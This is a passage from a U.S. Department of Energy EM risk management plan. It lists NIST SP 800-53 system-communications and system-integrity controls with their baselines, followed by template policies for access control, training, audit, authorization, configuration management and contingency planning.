________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
229 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
SC-6 Resource Priority X No No P0The information systemlimits the use of resourcesby priority.
SC-7 Boundary Protection X X X X X X X X X No No P1
The information system: a)Monitors and controlscommunications at theexternal boundary of thesystem and at key internalboundaries within thesystem; and b) Connects toexternal networks orinformation systems onlythrough managed interfacesconsisting of boundaryprotection devices arrangedin accordance with anorganizational securityarchitecture.
SC-7(1) Boundary Protection X X X X X X X X No No P1
The organization physicallyallocates publicly accessibleinformation systemcomponents to separate subnetworks with separatephysical network interfaces.
SC-7(2) Boundary Protection X X X X X X X X No No P1
The information systemprevents public access intothe organization’s internalnetworks except asappropriately mediated bymanaged interfacesemploying boundaryprotection devices.
SC-7(3) Boundary Protection X X X X X X X X No No P1
The organization limits thenumber of access points tothe information system toallow for morecomprehensive monitoringof inbound and outboundcommunications andnetwork traffic.
SC-7(4) Boundary Protection X X X X X X X X No No P1
The organization: a)Implements a managedinterface for each externaltelecommunication service;b) Establishes a traffic flowpolicy for each managedinterface; c) Employssecurity controls as neededto protect the confidentialityand integrity of theinformation beingtransmitted; d) Documentseach exception to the trafficflow policy with a supportingmission/business need andduration of that need; e)Reviews exceptions to thetraffic flow policy[Assignment: organization-defined frequency]; and f)Removes traffic flow policyexceptions that are nolonger supported by anexplicit mission/businessneed.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
230 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
SC-7(5) Boundary Protection X X X X X X X X No No P1
The information system atmanaged interfaces, deniesnetwork traffic by defaultand allows network traffic byexception (i.e., deny all,permit by exception).
SC-7(6) Boundary Protection X
The organization preventsthe unauthorized release ofinformation outside of theinformation systemboundary or anyunauthorizedcommunication through theinformation systemboundary when there is anoperational failure of theboundary protectionmechanisms.
SC-7(7) Boundary Protection X X X X X X X X No No P1
The information systemprevents remote devicesthat have established a non-remote connection with thesystem from communicatingoutside of thatcommunications path withresources in externalnetworks.
SC-7(8) Boundary Protection X X X X X X X No No P1
The information systemroutes [Assignment:organization-definedinternal communicationstraffic] to [Assignment:organization-definedexternal networks] throughauthenticated proxy serverswithin the managedinterfaces of boundaryprotection devices.
SC-7(11) Boundary Protection X X X No No P1
The information systemchecks incomingcommunications to ensurethat the communicationsare coming from anauthorized source androuted to an authorizeddestination.
SC-7(12) Boundary Protection X X X X X X X X X No No P1
The information systemimplements host-basedboundary protectionmechanisms for servers,workstations, and mobiledevices.
SC-7(13) Boundary Protection X X X X X X No No P1
The organization isolates[Assignment: organizationdefined key informationsecurity tools, mechanisms,and support components]from other internalinformation systemcomponents via physicallyseparate subnets withmanaged interfaces to otherportions of the system.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
231 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
SC-7(14) Boundary Protection X X X X X X No No P1
The organization protectsagainst unauthorizedphysical connections acrossthe boundary protectionsimplemented at[Assignment: organization-defined list of managedinterfaces].
SC-7(18) Boundary Protection X X X X X X X X X No No P1
The information system failssecurely in the event of anoperational failure of aboundary protection device.
SC-8Transmission
IntegrityX X X X X No No P1
The information systemprotects the integrity oftransmitted information.
SC-8(1)Transmission
IntegrityX X X X No No P1
The organization employscryptographic mechanismsto recognize changes toinformation duringtransmission unlessotherwise protected byalternative physicalmeasures.
SC-8(2)Transmission
IntegrityX No No P1
The information systemmaintains the integrity ofinformation duringaggregation, packaging, andtransformation inpreparation fortransmission.
SC-9TransmissionConfidentiality
X X X X X No No P1The information systemprotects the confidentialityof transmitted information.
SC-9(1)TransmissionConfidentiality
X X X X X No No P1
The organization employscryptographic mechanismsto prevent unauthorizeddisclosure of informationduring transmission unlessotherwise protected by[Assignment: organization-defined alternative physicalmeasures].
SC-9(2)TransmissionConfidentiality
X X No No P1
The information systemmaintains the confidentialityof information duringaggregation, packaging, andtransformation inpreparation fortransmission.
SC-10 Network Disconnect X X X X X X X X No Yes P2
The information systemterminates the networkconnection associated witha communications sessionat the end of the session orafter [Assignment:organization-defined timeperiod] of inactivity.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
232 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
SC-11 Trusted Path X X X No Yes P0
The information systemestablishes a trustedcommunications pathbetween the user and theFollowing security functionsof the system: [Assignment:organization-definedsecurity functions to includeat a minimum, informationsystem authentication andreauthentication].
SC-12Cryptographic KeyEstablishment And
ManagementX X X X X X X X X No No P1
The organization establishesand manages cryptographickeys for requiredcryptography employedwithin the informationsystem.
SC-12(1)Cryptographic KeyEstablishment And
ManagementX X X X No No P1
The organization maintainsavailability of information inthe event of the loss ofcryptographic keys by users.
SC-13 Use Of Cryptography X X X X X X X X X Yes Yes P1
The information systemimplements requiredcryptographic protectionsusing cryptographic modulesthat comply with applicablefederal laws, ExecutiveOrders, directives, policies,regulations, standards, andguidance.
SC-13(4) Use Of Cryptography X X Yes Yes P1
The organization employs[Selection: FIPS-validated;NSA-approved] cryptographyto implement digitalsignatures.
SC-14Public AccessProtections
X X X X X X X X X No No P1
The information systemprotects the integrity andavailability of publiclyavailable information andapplications.
SC-15Collaborative
Computing DevicesX X X X X X No Yes P1
The information system: a)Prohibits remote activationof collaborative computingdevices with the followingexceptions: [Assignment:organization-definedexceptions where remoteactivation is to be allowed];and b) Provides an explicitindication of use to usersphysically present at thedevices.
SC-15(1)Collaborative
Computing DevicesX X X No Yes P1
The information systemprovides physical disconnectof collaborative computingdevices in a manner thatsupports ease of use.
SC-15(2)Collaborative
Computing DevicesX X X X X X No Yes P1
The information system orsupporting environmentblocks both inbound andoutbound traffic betweeninstant messaging clientsthat are independentlyconfigured by end users andexternal service providers.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
233 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
SC-15(3)Collaborative
Computing DevicesX X X X X X No Yes P1
The organization disables orremoves collaborativecomputing devices frominformation systems in[Assignment: organization-defined secure work areas].
SC-17Public Key
InfrastructureCertificates
X X X X X X X X No No P1
The organization issuespublic key certificates underan [Assignment:organization-definedcertificate policy] or obtainspublic key certificates underan appropriate certificatepolicy from an approvedservice provider.
SC-18 Mobile Code X X X X X No Yes P1
The organization: a) Definesacceptable andunacceptable mobile codeand mobile codetechnologies; b) Establishesusage restrictions andimplementation guidance foracceptable mobile code andmobile code technologies;and c) Authorizes, monitors,and controls the use ofmobile code within theinformation system.
SC-18(1) Mobile Code X X X No Yes P1
The information systemimplements detection andinspection mechanisms toidentify unauthorized mobilecode and takes correctiveactions, when necessary.
SC-18(2) Mobile Code X X X No Yes P1
The organization ensuresthe acquisition,development, and/or use ofmobile code to be deployedin information systemsmeets [Assignment:organization-defined mobilecode requirements].
SC-18(3) Mobile Code X X X No Yes P1
The information systemprevents the download andexecution of prohibitedmobile code.
SC-18(4) Mobile Code X X X No Yes P1
The information systemprevents the automaticexecution of mobile code in[Assignment: organization-defined softwareapplications] and requires[Assignment: organization-defined actions] prior toexecuting the code.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
234 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
SC-19Voice Over Internet
ProtocolX X X X X X X X No No P1
The organization: a)Establishes usagerestrictions andimplementation guidance forVoice over Internet Protocol(VoIP) technologies basedon the potential to causedamage to the informationsystem if used maliciously;and b) Authorizes, monitors,and controls the use of VoIPwithin the informationsystem.
SC-20
SecureName/Address
Resolution Service(Authoritative
Source)
X X X X X X No Yes P1
The information systemprovides additional dataorigin and integrity artifactsalong with the authoritativedata the system returns inresponse to name/addressresolution queries.
SC-20(1)
SecureName/Address
Resolution Service(Authoritative
Source)
X X X X X X No No P1
The information system,when operating as part of adistributed, hierarchicalnamespace, provides themeans to indicate thesecurity status of childsubspaces and (if the childsupports secure resolutionservices) enable verificationof a chain of trust amongparent and child domains.
SC-21
SecureName/Address
Resolution Service(Recursive Or
Caching Resolver)
X X X X No Yes P1
The information systemperforms data originauthentication and dataintegrity verification on thename/address resolutionresponses the systemreceives from authoritativesources when requested byclient systems.
SC-21(1)
SecureName/Address
Resolution Service(Recursive Or
Caching Resolver)
X X X No Yes P1
The information systemperforms data originauthentication and dataintegrity verification on allresolution responseswhether or not local clientsexplicitly request thisservice.
SC-22
Architecture AndProvisioning ForName/Address
Resolution Service
X X X X X X X X X X X No Yes P1
The information systemsthat collectively providename/address resolutionservice for an organizationare fault-tolerant andimplement internal/externalrole separation.
SC-23 Session Authenticity X X X X X No Yes P1
The information systemprovides mechanisms toprotect the authenticity ofcommunications sessions.
SC-23(1) Session Authenticity X X X No Yes P1
The information systeminvalidates sessionidentifiers upon user logoutor other session termination.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
235 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
SC-23(2) Session Authenticity X X X No Yes P1
The information systemprovides a readilyobservable logout capabilitywhenever authentication isused to gain access to webpages.
SC-23(3) Session Authenticity X X X No Yes P1
The information systemgenerates a unique sessionidentifier for each sessionand recognizes only sessionidentifiers that are system-generated.
SC-23(4) Session Authenticity X X X No Yes P1
The information systemgenerates unique sessionidentifiers with [Assignment:organization-definedrandomness requirements].
SC-24 Fail In Known State X X X X X X X yes Yes P1
The information system failsto a [Assignment:organization-defined known-state] for [Assignment:organization-defined typesof failures] preserving[Assignment: organization-defined system stateinformation] in failure.
SC-28Protection Of
Information At RestX X X X X X X X Yes Yes P1
The information systemprotects the confidentialityand integrity of informationat rest.
SC-28(1)Protection Of
Information At RestX X Yes Yes P1
The organization employscryptographic mechanismsto prevent unauthorizeddisclosure and modificationof information at rest unlessotherwise protected byalternative physicalmeasures.
SC-32Information System
PartitioningX X X X X X No No PO
The organization partitionsthe information system intocomponents residing inseparate physical domains(or environments) asdeemed necessary.
SC-33Transmission
Preparation IntegrityX No Yes PO
The information systemprotects the integrity ofinformation during theprocesses of dataaggregation, packaging, andtransformation inpreparation fortransmission.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
236 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
SI-1
System AndInformation Integrity
Policy AndProcedures
X X X X X X X X X X X X Yes Yes P1
The organization develops,disseminates, andreviews/updates[Assignment: organization-defined frequency]: a) Aformal, documented systemand information integritypolicy that addressespurpose, scope, roles,responsibilities,management commitment,coordination amongorganizational entities, andcompliance; and b) Formal,documented procedures tofacilitate the implementationof the system andinformation integrity policyand associated system andinformation integritycontrols.
SI-2 Flaw Remediation X X X X X X Yes Yes P1
The organization: a)Identifies, reports, andcorrects information systemflaws; b) Tests softwareupdates related to flawremediation foreffectiveness and potentialside effects onorganizational informationsystems before installation;and c) Incorporates flawremediation into theorganizational configurationmanagement process.
SI-2(1) Flaw Remediation X
The organization centrallymanages the flawremediation process andinstalls software updatesautomatically.
SI-2(2) Flaw Remediation X X X X No No P1
The organization employsautomated mechanisms[Assignment: organization-defined frequency] todetermine the state ofinformation systemcomponents with regard toflaw remediation.
SI-2(3) Flaw Remediation X X X No Yes P1
The organization measuresthe time between flawidentification and flawremediation, comparing with[Assignment: organization-defined benchmarks].
SI-2(4) Flaw Remediation X X X No Yes P1
The organization employsautomated patchmanagement tools tofacilitate flaw remediation to[Assignment: organization-defined information systemcomponents].
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
237 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
SI-3Malicious Code
ProtectionX X X X X X No No P1
The organization: a) Employsmalicious code protectionmechanisms at informationsystem entry and exit pointsand at workstations, servers,or mobile computing deviceson the network to detect anderadicate malicious code: 1)Transported by electronicmail, electronic mailattachments, web accesses,removable media, or othercommon means; or 2)Inserted through theexploitation of informationsystem vulnerabilities; b)Updates malicious codeprotection mechanisms(including signaturedefinitions) whenever newreleases are available inaccordance withorganizational configurationmanagement policy andprocedures; c) Configuresmalicious code protectionmechanisms to: 1) - Performperiodic scans of theinformation system[Assignment: organization-defined frequency] and real-time scans of files fromexternal sources as the filesare downloaded, opened, orexecuted in accordance withorganizational securitypolicy; and 2) [Selection(one or more): blockmalicious code; quarantinemalicious code; send alertto administrator;[Assignment: organization-defined action]] in responseto malicious code detection;and d) Addresses the receiptof false positives duringmalicious code detectionand eradication and theresulting potential impact onthe availability of theinformation system.
SI-3(1)Malicious Code
ProtectionX X X X X No No P1
The organization centrallymanages malicious codeprotection mechanisms.
SI-3(2)Malicious Code
ProtectionX X X X X No No P1
The information systemautomatically updatesmalicious code protectionmechanisms (includingsignature definitions).
SI-3(3)Malicious Code
ProtectionX X X X X No No P1
The information systemprevents non-privilegedusers from circumventingmalicious code protectioncapabilities.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
238 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
SI-4Information System
MonitoringX X X X X No Yes P1
The organization: a)Monitors events on theinformation system inaccordance with[Assignment: organization-defined monitoringobjectives] and detectsinformation system attacks;b) Identifies unauthorizeduse of the informationsystem; c) Deploysmonitoring devices: (i)strategically within theinformation system tocollect organization-determined essentialinformation; and (ii) at adhoc locations within thesystem to track specifictypes of transactions ofinterest to the organization;d) Heightens the level ofinformation systemmonitoring activity wheneverthere is an indication ofincreased risk toorganizational operationsand assets, individuals,other organizations, or theNation based on lawenforcement information,intelligence information, orother credible sources ofinformation; and e) Obtainslegal opinion with regard toinformation systemmonitoring activities inaccordance with applicablefederal laws, ExecutiveOrders, directives, policies,or regulations.
SI-4(1)Information System
MonitoringX X X No No P1
The organizationinterconnects andconfigures individualintrusion detection tools intoa system wide intrusiondetection system usingcommon protocols.
SI-4(2)Information System
MonitoringX X X X X No No P1
The organization employsautomated tools to supportnear real-time analysis ofevents.
SI-4(4)Information System
MonitoringX X X X X X X X No No P1
The information systemmonitors inbound andoutbound communicationsfor unusual or unauthorizedactivities or conditions.
SI-4(5)Information System
MonitoringX X X X X No No P1
The information systemprovides near real-timealerts when the followingindications of compromiseor potential compromiseoccur: [Assignment:organization-defined list ofcompromise indicators].
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
239 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
SI-4(6)Information System
MonitoringX X X X X No No P1
The information systemprevents non-privilegedusers from circumventingintrusion detection andprevention capabilities.
SI-4(7)Information System
MonitoringX X X X X X No Yes P1
The information systemnotifies [Assignment:organization-defined list ofincident response personnel(identified by name and/orby role)] of suspiciousevents and takes[Assignment: organization-defined list of least-disruptive actions toterminate suspiciousevents].
SI-4(8)Information System
MonitoringX X X X X X X X X No No P1
The organization protectsinformation obtained fromintrusion-monitoring toolsfrom unauthorized access,modification, and deletion.
SI-4(9)Information System
MonitoringX X X No Yes P1
The organizationtests/exercises intrusion-monitoring tools[Assignment: organization-defined time-period].
SI-4(11)Information System
MonitoringX X X No No P1
The organization analyzesoutbound communicationstraffic at the externalboundary of the system (i.e.,system perimeter) and, asdeemed necessary, atselected interior pointswithin the system (e.g.,subnets, subsystems) todiscover anomalies.
SI-4(12)Information System
MonitoringX X X X X X No Yes P1
The organization employsautomated mechanisms toalert security personnel ofthe following inappropriateor unusual activities withsecurity implications:[Assignment: organization-defined list of inappropriateor unusual activities thattrigger alerts].
SI-4(14)Information System
MonitoringX X X X X X No No P1
The organization employs awireless intrusion detectionsystem to identify roguewireless devices and todetect attack attempts andpotentialcompromises/breaches tothe information system.
SI-4(15)Information System
MonitoringX X X X X X No No P1
The organization employs anintrusion detection systemto monitor wirelesscommunications traffic asthe traffic passes fromwireless to wire linenetworks.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
240 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
SI-4(16)Information System
MonitoringX X X No Yes P1
The organization correlatesinformation from monitoringtools employed throughoutthe information system toachieve organization-widesituational awareness.
SI-4(17)Information System
MonitoringX X X X X X No Yes P1
The organization correlatesresults from monitoringphysical, cyber, and supplychain activities to achieveintegrated situationalawareness.
SI-5Security Alerts,Advisories, And
DirectivesX X X X X X No No P1
The organization: a)Receives information systemsecurity alerts, advisories,and directives fromdesignated externalorganizations on an ongoingbasis; b) Generates internalsecurity alerts, advisories,and directives as deemednecessary; c) Disseminatessecurity alerts, advisories,and directives to[Assignment: organization-defined list of personnel(identified by name and/orby role)]; and d) Implementssecurity directives inaccordance with establishedtime frames, or notifies theissuing organization of thedegree of noncompliance.
SI-5(1)Security Alerts,Advisories, And
DirectivesX X X X No No P1
The organization employsautomated mechanisms tomake security alert andadvisory informationavailable throughout theorganization as needed.
SI-6Security
FunctionalityVerification
X X X X No Yes P1
The information systemverifies the correct operationof security functions[Selection (one or more):[Assignment: organization-defined system transitionalstates]; upon command byuser with appropriateprivilege; periodically every[Assignment: organization-defined time-period]] and[Selection (one or more):notifies systemadministrator; shuts thesystem down; restarts thesystem; [Assignment:organization-definedalternative action(s)]] whenanomalies are discovered.
SI-6(1)Security
FunctionalityVerification
X X X No Yes P1
The information systemprovides notification offailed automated securitytests.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
241 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
SI-6(3)Security
FunctionalityVerification
X X X No Yes P1
The organization reports theresult of security functionverification to designatedorganizational officials withinformation securityresponsibilities.
SI-7Software And
Information IntegrityX X X No No P1
The information systemdetects unauthorizedchanges to software andinformation.
SI-7(1)Software And
Information IntegrityX X X No No P1
The organization reassessesthe integrity of software andinformation by performing[Assignment: organization-defined frequency] integrityscans of the informationsystem.
SI-7(2)Software And
Information IntegrityX X No No P1
The organization employsautomated tools thatprovide notification todesignated individuals upondiscovering discrepanciesduring integrity verification.
SI-8 Spam Protection X X X X X X X X No No P1
The organization: a) Employsspam protectionmechanisms at informationsystem entry and exit pointsand at workstations, servers,or mobile computing deviceson the network to detect andtake action on unsolicitedmessages transported byelectronic mail, electronicmail attachments, webaccesses, or other commonmeans; and b) Updatesspam protectionmechanisms (includingsignature definitions) whennew releases are availablein accordance withorganizational configurationmanagement policy andprocedures.
SI-8(1) Spam Protection X X X X X X X No No P1The organization centrallymanages spam protectionmechanisms.
SI-8(2) Spam Protection X X X X X X No No P1
The information systemautomatically updates spamprotection mechanisms(including signaturedefinitions).
SI-9Information Input
RestrictionsX X X X X Yes Yes P2
The organization restrictsthe capability to inputinformation to theinformation system toauthorized personnel.
SI-10Information Input
ValidationX X X X No No P1
The information systemchecks the validity ofinformation inputs.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
242 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
SI-11 Error Handling X X X X X No No P2
The information system: a)Identifies potentiallysecurity-relevant errorconditions; b) Generateserror messages that provideinformation necessary forcorrective actions withoutrevealing [Assignment:organization-definedsensitive or potentiallyharmful information] in errorlogs and administrativemessages that could beexploited by adversaries;and c) Reveals errormessages only to authorizedpersonnel.
SI-12Information Output
Handling AndRetention
X X X X X X X X X Yes Yes P2
The organization handlesand retains both informationwithin and output from theinformation system inaccordance with applicablefederal laws, ExecutiveOrders, directives, policies,regulations, standards, andoperational requirements.
SI-13Predictable Failure
PreventionX No Yes P0
The organization: a) Protectsthe information system fromharm by considering meantime to failure for[Assignment: organization-defined list of informationsystem components] inspecific environments ofoperation; and b) Providessubstitute informationsystem components, whenneeded, and a mechanismto exchange active andstandby roles of thecomponents.
Appendix C – NIST SP 800-53 Rev 4 Control Family Policies
EM sites may adopt the policies listed in this section or create their own policies toaddress the control policy requirements in NIST SP 800-53.
AC-1 Account Management
Purpose: The purpose of the AC control family is to ensure that only those that havebeen granted formal access to an IT system are able to access the system or information.Access controls also allow the sites to detect; record and block would be intruders.
Scope: The access control family must be implemented and monitored on DOE andcontractor systems. These security controls provide protection of data through the use of
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
243 of 266
access restrictions to local and remote systems, least privilege functionality, encryptionfor data in transit and data at rest, separation of duties, restrictions on the use of mobiledevices and session termination.
Roles: The Information System Security Officer (ISSO) and the System Administrators(SA) are key to the implementation of this control family and are tasked to ensure thatproper access controls are implemented based on the NIST categorization level.
Responsibilities: The ISSO is to ensure that the controls are implemented by the SAs,work as expected, and provide adequate protection for DOE EM and contractor systemsand data. (Refer to roles and responsibilities section of the RMAIP).
These controls are to be tested upon initial system authorization and then once everythree years by an independent assessor as part of a continuous monitoring program. Thecontrols should also be tested when any significant access procedures or changes aremade to the system.
Management Commitment: The site management must ensure that sufficient accesscontrols are in place to protect the system and information based on the categorizationlevel, potential of harm, and acceptable level of residual risk. The site management mustprovide the resources to implement and must actively support the implementation ofHSPD-12 compliant logical access by 2012.
Coordination: The ISSO and SAs must coordinate to ensure that the proper level ofaccess controls are in use throughout the site and are tested as part of the initialauthorization and continuous monitoring program.
Compliance: The sites must comply with DOE orders, this RMAIP, and NIST SpecialPublications (SP) 800-46, 800-77, 800-113, 800-114, 800-121, 800-94, 800-97, 800-114,and 800-124 (as modified).
AT-1 Awareness and Training
Purpose: This family of controls ensures that all personnel (users, administrators,security, and those with elevated privileges) are trained for security policies andprocedures of their relevant position. This control also means that no one should haveaccess to a DOE network prior to having attended security awareness training. Similarly,individuals with elevated privileges must have additional training sufficient for them tocarry out their security functions.
Scope: Training needs to extend from site management to user personnel within anorganization. Training must be done annually to educate all personnel on emergingsystem and user exploits, risky behaviors (web and phishing), reportingincidents/suspicious procedures, and coordination with other groups that can benefit bylessons learned.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
244 of 266
Roles: Training must be accomplished by DOE EM and contractor sites and cover threelevels: (1) users, (2) SAs (system, database, and web), and (3) personnel with elevatedaccess privileges. The ISSM is responsible for making sure all personnel are sufficientlytrained. If the ISSO determines that training was not accomplished for the current year,the individual will be removed from access to DOE networks.
Responsibilities: The ISSO/ISSM must ensure that all individuals receive securitytraining as required by the site, annually. The ISSO must make sure that all individualsutilizing DOE EM and contractor network or systems processing EM data will receiveuser awareness training prior to being granted access to the network.
Management Commitment: The site management must provide sufficient direction andemphasis to ensure that all site personnel are trained at least annually. Management mustalso make certain that records are maintained on training and are kept current.
Coordination: The individual DOE EM sites must coordinate with the EM CyberSecurity Program Manager (CSPM) for review and guidance on their security AwarenessTraining depth and scope. In addition, the EM CSPM must be consulted on elevatedprivileged training.
Compliance: All sites must meet appropriate DOE policy and RMAIP guidance toensure sufficient and effective training of all personnel at all levels.
AU-1 Audit and Accountability
Purpose: Auditing is one of the critical methods to determine and document howeffective security controls are implemented, functioning as intended and producing theexpected results. Frequent audits ensure that security baselines are functioning correctly,being patched, have authorized CCB upgrades installed, and are sufficient to meet newand emerging security threats and vulnerabilities.
Scope: All DOE EM sites must conduct timely audits on security controls to determine ifthey meet NIST, DOE security requirements, federal laws, Executive orders, and/or localregulations or statutes.
Roles: The ISSO/ISSM are responsible for setting up, monitoring performance, andproviding guidance for corrective actions of audit findings. The ISSO/ISSM must keepthe AO/AODR informed on audits findings, the potential impact of the findings, and theoptions for addressing them.
Responsibilities: The ISSO is the principal individual to formulate, implement, andmonitor auditing reports. The ISSO is also the primary individual to establish the plan ofaction and milestones (POA&Ms) associated with corrective actions.
The ISSO and ISSM must define what is an auditable event, what information is to berecorded, how the events will be monitored and analyzed, where the information of the
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
245 of 266
events will be stored and for how long, what is the response/process to address auditfailures and how failures will be addressed.
The ISSO must ensure that policies, procedures and documents are updated annually toreflect audit weakness findings and corrective POA&Ms are put in place and followed.
Management Commitment: Site management must address any findings that could alterthe level of residual risk accepted by the AO during the authorization process.Management must provide the personnel, resources and funding to address the POA&Msproduced by audits.
Coordination: The ISSO and ISSM must coordinate with the AO/AODR on findings,potential security impacts, and recommended solutions.
Compliance: The sites auditing policies and procedures must meet NIST, DOE andRMAIP security requirements, and or local regulations or statutes.
CA-1 Security Assessment and Authorization
Purpose: Authorization is the process of evaluating the security policies and proceduresto protect an information system and the resulting level of acceptable risk (aftersafeguards have been applied to vulnerabilities). Authorization is an ongoing process tocontinually defend against emerging threats, system changes and inside personnelactions. This control addresses the state of a system at a defined time and configuration.
This set of security controls is used by the AO to determine the acceptable level ofresidual risk and if a system should have authority to operate (ATO).
Scope: Authorization is to be performed on all accreditation boundaries (systems orgroups of systems) providing services to DOE EM or contractor sites that process, store,or communicate DOE EM data. Authorizations can be performed on a three-year cycleprovided continuous monitoring is performed each year to cover all the NIST/DOEsecurity controls/requirements over the three-year period. The AO may elect to re-authorize each individual accreditation boundary after a yearly continuous monitoringassessment provided there is no significant increase in the acceptable level of risk.
Roles: Security authorization is the official management decision conveyed through theauthorization decision document, given by a senior organizational official or executive(i.e., authorizing official) to authorize operation of an information system and toexplicitly accept the risk to organizational operations and assets, individuals, otherorganizations, and the Nation based on the implementation of an agreed-upon set ofsecurity controls.
The ISSO/ISSM must provide the resources to prepare, assist in, and document the initialauthorization process, continuous monitoring assessments and re-authorizations.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
246 of 266
Responsibilities: Only the AO can sign/authorize a system for operation. The AODR isresponsible for advising the AO on technical matters, providing recommendations andpreparing for assessments. The ISSO/ISSM must provide the resources to prepare,personnel to assist in assessments and document continuous monitoring assessments orre-authorizations.
Management Commitment: The AO must ensure that sufficient resources andmanagement guidance is provided to prepare, conduct, document, and remediate systemflaws throughout the system development life-cycle (SDLC). The AO must follow theDOE and NIST security requirements to provide protection commensurate with risk. TheAO must ensure that all systems have ATO prior to being connected to the network. TheAO must ensure that the Risk Management Framework (RMF) and Risk ManagementApproach (RMA) are followed and systems are in compliance with its provisions.
Coordination: The AO, AODR, ISSO, and ISSM must coordinate all authorizationprocesses and Continuous Monitoring activities with site personnel.
Compliance: The AO must ensure that the RMF and RMA are followed and systems arein compliance with their provisions.
CM-1 Configuration Management
Purpose: This control family is used to maintain the authorized system securityconfiguration at the same level of residual risk as when it was authorized. Configurationmanagement is necessary because of inevitable hardware and software change, approvedbaseline control modification, and organizational changes that occur throughout all thephases of the SDLC.
Scope: This control applies to all DOE EM or DOE EM contractor systems
Roles: The ISSO, SAs, system owner, and CCB have the primary roles in configurationmanagement.
Responsibilities: The ISSO must create security baselines configurations forworkstations, servers, switches, routers, firewalls, databases, IDS/IPS, mobile, wireless,and web systems.
The ISSO or system owner must create, maintain, and monitor an inventory controlsystem for system components.
The site organizations must establish and use a CCB to evaluate, test, and approve allmajor changes to the secure baseline configurations prior to implementing them on asystem. The CCB must establish what is considered a major change to the securitybaseline and assess the security impact of such changes.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
247 of 266
The ISSO/SA must build system components to the latest approved baselineconfigurations and monitor systems compliance to these configurations on a regularbasis.
The site must monitor its approved security baseline configurations to determine anychanges or improper changes by inside or outside personnel.
The baseline configurations must provide the least functionality for the site personnel toaccomplish their mission.
The site must perform period risk assessments to determine if changes or emergingthreats have created vulnerabilities.
Management Commitment: The sites’ management must provide the resources forperiodic risk assessments, configuration control boards, configuration managementsoftware, and a current list of equipment, components, software, and approvedconfiguration changes to the security baselines for such equipment.
Coordination: The ISSO and ISSM must coordinate with the CCB, inventory control,procurement, and legal to ensure that security baseline specifications, federal checklists,approved CCB changes, patches and system authorization are performed prior to systemsbeing placed online or after significant changes occur within a system.
Compliance: The site must comply with federal baseline checklists, security baselinebuilds, approved CCB changes, procurement, and legal regulations.
CP-1 Contingency Planning
Purpose: The contingency planning controls are meant to establish policies andprocedures so that each site’s systems can accomplish their DOE EM mission within thetime periods specified by the business impact analysis (BIA). The organizations riskmanagement strategy is a key factor in the development of the contingency planpolicy/procedures.
Scope: The scope of this plan should address the minor to major incidents that disrupt,slow down, or halt the site’s DOE EM mission/business functions.
Roles: The Contingency Plan Manager and CP team (assessment, activation, recovery,alternate site) members are to be identified by name and position with contactinformation.
Responsibilities: The CP Manager must make the CP activation decision based oninformation from the analysis team as to the extent of the damage.
The team members must be trained and conduct bi-annual contingency exercises thatrealistically portray possible events.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
248 of 266
Management Commitment: The site’s management must provide the resources to staff,train, and conduct CP exercises. The management must, as deemed necessary, providethe resources for an alternate operating site, if deemed necessary by a BIA, that mustmeet the maximum allowable downtimes specified in the BIA.
Coordination: The site must ensure that all the sites accreditation boundaries participatein staffing, conducting CP exercises and CP training.
Compliance: The sites must comply with the provisions of the RMAIP, NIST SP 800-34(as modified) and any state or local contingency requirements.
IA-1 Identification and Authentication
Purpose: This control is used to authenticate users or processes that are requesting accessto either local, networked, or remote networks. These controls must be accomplished bytwo-factor authenticators such as tokens, biometrics, or badge and pin.
